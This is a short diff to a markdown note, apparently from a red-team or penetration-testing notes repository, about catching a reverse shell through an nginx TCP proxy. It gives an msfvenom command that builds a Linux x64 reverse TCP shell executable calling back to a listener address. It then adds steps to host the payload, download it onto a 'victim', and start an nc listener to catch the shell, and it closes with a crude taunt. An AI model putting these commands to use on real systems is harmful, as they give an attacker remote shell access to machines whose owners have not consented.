idkmq/CTE-For-Monkeys/WIP/proxy-nginx-tcpbs.md

     ```bash
    msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.178.132 LPORT=8080 -a x64 -f elf > yup.elf
     ```
-    > NOTE: Follow the same setup if you are using poshc2 for you bind port, probably
+    > **NOTE:** Follow the same setup if you are using poshc2 for you bind port, probably
+7. Host your payload however and download on victim
+8. Now if you are running msfvenom start you `nc` listener to catch your beacon.
+    ```bash
+    sudo nc -lnvp
+    ```
-7. tada you have a beacon shelly, fuck you.
+9.  tada you have a beacon shelly, fuck you.